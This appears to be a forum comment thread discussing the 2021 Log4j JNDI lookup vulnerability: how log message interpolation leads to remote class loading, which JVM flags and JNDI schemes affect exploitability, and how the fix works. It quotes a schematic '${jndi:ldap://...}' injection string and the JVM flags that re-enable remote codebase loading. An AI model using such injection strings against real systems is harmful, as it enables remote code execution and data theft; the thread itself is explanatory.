Anyone remember printf exploits? Feels strange to still be happening in 2021. I remember accidentally finding a printf exploit in an online Nintendo DS game when I was a kid, not that I knew what I was doing but it was fun to have my name be a bunch of constantly changing random numbers using %e in my online name. Sounds like the minecraft kids are having a bunch of fun with this one now :)
Yeah! sudo had a pretty good one, anyone could gain root access via it, back in 2012 [1].
I love the irony here though - given how people using Java tend to think its unexploitable compared to C/C++ code. This is arguably way worse than a format string exploit. Even user sanitized data gives you full RCE. And via url headers/strings. This feels like a 1990s web era exploit, it's pretty insane.
Yes, it's like a format string bug in C in that sense.
Most people don't take "log injection" that seriously as a bug class in Java. There are usually no consequences for ignoring it, so it's common. The RCE adds a lot of flavour to an otherwise bland bug.
No... not really. Actually the bad data is probably the data you most want to log. Kinda the point of logging. You do expect it to not screw up the logging system when bad data is logged. You expect to be able to log any random data (even if the log file formatting may get confusing in case of maliciously formatted data)
```
I believe that applications that use log4j-api with log4j-to-slf4j, without using log4j-core, are not impacted by this vulnerability. (Because the lookup and JNDI implementations are in log4j-core.)
There are comments suggesting that this was reported the Apache some time ago, but a CVE wasn't assigned? Getting a CVE assigned, even with hardly any details at all ("get ready to upgrade log4j") could have really helped people here.
Yes, more specifically after Java 8u191 you need to flag the client with:
-Dcom.sun.jndi.ldap.object.trustURLCodebase=true
-Dcom.sun.jndi.rmi.object.trustURLCodebase=true
While RCE is not possible without these flags, you will still get pingback, in minecraft's example, allowing you to get the IP of everyone connected.
While the specific exploit may not be possible in 8u191 and later, I am not convinced they are safe from all RCEs using this vulnerability. It does make it harder to exploit, and hit or miss depending on what is available in the classpath.
If you check the argument, one is for RMI and the other is for LDAP, if your PoC uses LDAP then you need the LDAP one, else RMI, etc.. But yes, most people probably don't have this enabled, so the only concern is a pingback in modern java.
This change is included in tag jdk8-b01, which was the first release build of Java 8.
I don't think this exploit as described actually works against a default-configured JVM released any time in the last decade. Is there actually an executable PoC which shows otherwise?
Now, it's true there are ways to exploit deserialisation without loading code. You need to find a class in the classpath that does something sketchy when deserialised. There has been a lot of work to clean up such things in recent years, but it's possible some still exist. Again, i would like to see a PoC.
> Apparently there had been a prior patch (CVE-2009-1094) for LDAP, but that was completely ineffective for the factory codebase. Therefore, LDAP names would still allow direct remote code execution for some time after the RMI patch. That “oversight” was only addressed later as CVE-2018-3149 in Java 8u191 (see https://bugzilla.redhat.com/show_bug.cgi?id=1639834).
It is still possible to RCE, but you won’t be able to achieve it using the proof of concept code. See the article for resources that describe alternative methods to exploit.
Does anyone know the details of how this got discovered and released? It definitely doesn’t sound like a normal responsible disclosure process if it was discovered a few hours before this post. Was it spotted being abused?
Does anyone in here know what url schemes are valid for JNDI and/or this bug in particular? The example is LDAP but is that the only one JNDI supports? Would HTTPS or even data urls work?
says that LDAP, DNS, RMI Registry, and CORBA Name Service are included in Java, and others may be discovered at load time (but I bet they aren't because that's very niche).
Have not used Log4J for ages but is this the common way to do it? To concatenate parameters into the log messages? In most logging tools where templates with parameters is used you are supposed to pass input as parameters into the templates, not change the templates?. No?
Edit: Found the answer to my own Q. "Do not use String concatenation. Use parameterized message..."
All of us are scrambling to upgrade to 2. This OSS tool can help prioritise attack paths using runtime context. We had a potential exposure due to Elasticsearch, found out and patched. https://github.com/deepfence/ThreatMapper
always always always keep use of 3rd party java libraries to a minimum. While not necessarily useful in this case, I often see answers on stackoverflow saying "oh just use this apache commons or guava library" when there's a perfectly sound and easy way of just doing it in java. Makes me want to scream
I haven't read into the specifics of this issue but doesn't a RCE vulnerability in a Java library really rest on a RCE vulnerability in Java/JRE itself?
Not necessarily, java has explicit mechanisms for dynamic code loading (classloaders) and if those are reachable from unsanitized user input then you have what amounts to a very indirect and enterprise-grade eval().
You would call out to JNDI in a logging statement. That would cause the remote class to be loaded and executed during the log statement evaluation.
A nefarious attacker could inject such a JNDI reference in a field (like username or whatever) and if you wrote your log statements in a manner that didn’t expect such injection to happen, it could become part of the log format instead of a log field value, and this would be executed.
Think of it like SQL injection but with log statements and way worse because it calls a class that can be hosted on a server of choice. And the code that can execute is arbitrary and not limited to the database.
If you want to go down the route, you should check if log4j allows a port to be specified in the LDAP URI. If it does, firewalling one port won't do anything.
12 years of experience with .Net here - it’s been a long time since I used log4net and I was never intimately familiar with it, but I’m not aware of any built-in or common .Net functionality that will make a web request and remotely load code just by parsing a string. So unless the log4net library totally implemented that feature from scratch, it should be safe.
No reason to think that it is -- it's related to a specific implementation of a java technology, it would require completely a completely hypothetical parallel track.
This is an odd question, but if you're saying you downloaded a java based game that suffers this RCE, I don't think Steam does a single thing to protect you.
According to the article, Steam was directly affected by this vulnerability. But I'd guess that's a problem on their backend and not on the Steam client.
I’m with you, but if you’re maintaining a massively popular open source library, where backwards compatibility is expected, you’re not going to remove features without careful consideration. For an important bug fix, it probably does make more sense to just fix it without breaking anything first, then talk about a more careful deprecation/removal plan.
It's not. Backwards compatibility however is which is why the fix maintains the functionality but makes it as safe as possible rather than ripping it out.
It depends on the repository settings. If you have write access (and note the person who opens the PR appears to be a member of Apache, so I'm assuming they have write access), the default settings in Github allow merging even without approval, or with requested changes. (I.e., the defaults are pretty lax; you have to enable the "requires approval to merge" stuff.)
Even if approval is required, anyone with admin access can override the lack of approval. (For that user, the merge button is a different color/state: it very clearly warns you when you exercise that right.) I don't think it's clear which is the case here.
(But also note that there is an approval, in addition to the "changes requested". So, even in the scenario that approval is required, the PR could be merged, technically, but it would require dismissing the requested changes in that case, which was not done here.)
That example is good to clarify but really all it does is show that the vulnerability is indeed in the library, not user error on the part of the application developer. At the end of the day, format-string bugs are essentially unexpected interpolation of user-supplied input, which is what we have here.
The fact that the specific interpolation causes a server-side request is what makes it a server-side request forgery. This isn’ta url input that’s getting an unexpected scheme, the interpolation is required.
Lastly the fact that the server-side request forgery causes unexpected code to be downloaded and executed creates the RCE.
This may seem like needless pedantry, but the reason it’s important is that there are likely other bugs hidden in here, and the RCE is just getting all the attention. For example, our network diallows egress except through a proxy. The initial JNDI request over LDAP isn’t getting anywhere. So we aren’t exposed per the POCs I’ve seen. BUT if JNDI supported HTTPS or data url schemes we would. Also if the interpolation allows any other deserialization attacks through inline payloads we would.
Typically a logging library has one job to do: swallow the string as if it's some black box and spit it elsewhere as per provided configurations. Log4j though, doesn't treat strings as black boxes. It inspects its contents and checks if it contains any "variables" that need to be resolved before spitting out.
Now there's a bunch of ways to interpolate "variables" into log content. For example something like "Logging from ${java:vm}" will print "Logging from Oracle JVM". I'm not sure but you get the idea.
One way to resolve a variable using a custom Java resolver is by looking it up through a remote class hosted in some LDAP server, say "${jndi:ldap://someremoteclass}" (I'm still not quite sure why LDAP comes into the picture). Turns out, by including "." in some part of the URL to this remote class, Log4j lets off its guard & simply looks up to that server and dynamically loads the class file.
The fix has introduced ways to configure an allowed set of hosts/protocols/etc and forces Log4j to go through this configuration such that these dynamic resolutions don't land on an random/evil server.